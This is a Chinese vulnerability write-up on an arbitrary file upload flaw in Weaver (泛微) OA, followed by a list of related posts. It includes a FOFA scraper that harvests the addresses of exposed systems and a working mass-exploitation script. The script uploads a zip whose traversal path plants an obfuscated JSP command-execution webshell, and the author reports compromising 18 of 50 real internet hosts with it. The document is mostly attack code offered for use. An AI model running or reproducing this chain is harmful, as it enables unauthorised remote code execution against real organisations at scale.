[漏洞挖掘]SRC-泛微OA文件上传
SRC–泛微OA任意文件上传
泛微OA weaver.common.Ctrl 任意文件上传漏洞
存在漏洞的路径为:
/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp
首页:
请求包:
FOFA: app=“泛微-协同办公OA” && is_domain=true
普通注册会员只能获取5页信息。
有FOFA会员可以直接通过API请求拿到IP跟域名。
通过爬虫批量获取域名和IP,并且保存。
FOFA爬虫:
import requests
import urllib3
from lxml import etreeurllib3.disable_warnings() #忽略https证书告警
headers = {'Cookie': '登录后获取自己的cookie','Upgrade-Insecure-Requests': '1','Referer': 'https://fofa.so/','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'
}# fofa搜索结果url
base_url = "https://fofa.so/resultqbase64=YXBwPSLms5vlvq4t5Y2P5ZCM5Yqe5YWsT0EiICYmIGlzX2RvbWFpbj10cnVl&page_size=50&page="def get_domainList(url):response = requests.get(url=url, verify=False, headers=headers)selector = etree.HTML(response.text)domainList = selector.xpath('//span[@class="aSpan"]/a/text()')return domainListdef get_IPLIst(url):response = requests.get(url=url, verify=False, headers=headers)selector = etree.HTML(response.text)IPList = selector.xpath('//div[@class="contentMain"]/div[@class="contentLeft"]/p[2]/a[@class="jumpA"]/text()')return IPListdef write_list(listName, filename):f = open(filename, 'a', encoding='utf-8')print("writeing in : ", filename)for list1 in listName:print(list1)f.write(list1 +('\n'))f.close()def main():for i in range(1, 6):url = base_url+str(i)domainList = get_domainList(url)IPList = get_IPLIst(url)write_list(domainList, "./save_file/fanWeiOA-domainList.txt")write_list(IPList, "./save_file/fanWeiOA-IPList.txt")print("save success!")if __name__ == '__main__':main()POC
import zipfile
import random
import sys
import requestsdef generate_random_str(randomlength=16):random_str = ''base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'length = len(base_str) - 1for i in range(randomlength):random_str += base_str[random.randint(0, length)]return random_strmm = generate_random_str(8)webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1def file_zip():shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%if(request.getParameter("cmd")!=null){BASE64Decoder decoder = new BASE64Decoder();Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));Process e = (Process)rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(newString(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, newObject[]{}), request.getParameter("cmd") );java.io.InputStream in = e.getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
%>""" ## 替换shell内容# 参数compression表示在写zip文档时使用的压缩方法,它的值可以是zipfile. ZIP_STORED 或zipfile. ZIP_DEFLATED。如果要操作的zip文件大小超过2G,应该将allowZip64设置为Truezf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)# writestr()支持将二进制数据直接写入到压缩文档zf.writestr(webshell_name2, shell)def GetShell(urllist):file_zip()print('上传文件中')urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]requests.post(url=urls,files=file,timeout=60, verify=False)GetShellurl = urllist+'/cloudstore/'+webshell_name1GetShelllist = requests.get(url=GetShellurl)if GetShelllist.status_code == 200:print('利用成功webshell地址为:'+GetShellurl)else:print('未找到webshell利用失败')def main():print("python3 poc.py http://xx.xx.xx.xx")with open("./save_file/fanWeiOA-domainList.txt", "r") as f:results = f.readlines()for result in results:if "http" in result:url = result.strip()GetShell(url)else:url = "http://" + resulturl = url.strip()GetShell(url)if __name__ == '__main__':main()结果:
验证:
我这里没有fofa会员,只能获取到50条信息,其中这50个地址中成功利用的有18个。如果有fofa会员批量上分不是问题。
[漏洞挖掘]SRC-泛微OA文件上传相关推荐
- CNVD-2021-49104漏洞复现(泛微E-Office文件上传漏洞)
1.漏洞检测脚本 自己写的简单检测脚本,感兴趣可以看看 CSDN 2.漏洞成因 该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包,实现任意代码执行. ...
- 泛微E-Office文件上传漏洞(CNVD-2021-49104)
泛微E-Office文件上传漏洞(CNVD-2021-49104) 漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台.由于 e-office 未能正确处理上传模块中的用户输入,攻击者 ...
- (php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)
漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台. CNVD-2021-49104 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包 ...
- 泛微 E-Office文件上传漏洞复现(CVE-2023-2523、CVE-2023-2648)
0x01 产品简介 泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用.高效智能的原则,为企业快速打造移动化. ...
- 泛微 E-Office 文件上传Getshell
ip:xxx.xxx.xxx.xxx 2.通过Thelostworld_OA发现此IP有泛微文件上传漏洞 3.在命令执行一栏输入命令,显示注入哥斯拉木马,利用哥斯拉进行连接,连接成功. 4.在哥斯拉命 ...
- 泛微任意文件上传(CNVD-2021-49104)
CNVD-2021-49104 goby exp 声明 代码 poc集合 声明 本程序仅供于学习交流,请使用者遵守<中华人民共和国网络安全法>,勿将此脚本用于非授权的测试,脚本开发者不负任 ...
- CNVD-2021-49104——泛微E-Office文件上传漏洞
0x01 漏洞简介 泛微e-office是泛微旗下的一款标准协同移动办公平台.由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行. ...
- 致远OA 文件上传漏洞
报告编号:B6-2021-010801 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-08 0x01漏洞简述 2021年01月08日,360CERT监测发现致远OA发布 ...
- SRC挖洞之文件上传/下载漏洞的实战案例
文章目录 前言 任意文件下载 案例1 某OA系统任意文件下载 案例2 某登录页面任意文件下载 案例3 某金融网站任意文件下载 案例4 服务端过滤 ../ 绕过下载 案例5 %00截断后下载任意文件 文 ...
- 致远OA文件上传漏洞(含批量检测POC)
文章目录 文件上传 wpsAssistServlet 任意文件上传 漏洞描述 漏洞影响 网络测绘 批量检测POC ajax.do 任意文件上传 CNVD-2021-01627漏洞 漏洞描述 漏洞影响 ...
最新文章
- 通过PowerShell开源社区的Win32-OpenSSH来管理你的Windows服务器
- Flutter开发之布局-2-row(16)
- android grideview 图片png透明,Android完美解决GridView异步加载图片和加载大量图片时出现Out Of Memory问题...
- scala中使用特质中的抽象字段和实际字段
- 笔记本电脑锁_2020年最好的10款笔记本电脑
- 继iptables之后的新一代包过滤框架是nftables
- 按下组合键 可以迅速锁定计算机,Win7锁定计算机快捷键是什么?Win7使用锁定计算机快捷键的方法...
- 字符串数组排序,如果可以保证前一个字符的末尾与后一个字符的开头相同,返回1,否则返回-1...
- Webservice 用http get方式无法请求到的解决办法
- c语言伪代码写for循环,伪代码撰写规范
- linux能不能装小狼毫输入法,小狼毫输入法如何设置?
- minimax算法(井子棋)
- 【云云怪】第4个项目:20以内加减法(剧情版)
- 叮咚,ps术语请查收~
- AltiumDesigner19(AD19)使用设置技巧
- A股实践 :图神经网络与新闻共现矩阵策略(附代码)
- Redhat 7 安装 iftop软件
- 【Python】什么是递归函数?
- Firefox 48 beta和E10S发布
- 邮箱的容量怎么算怎么看?免费邮箱容量多大?能办公用吗?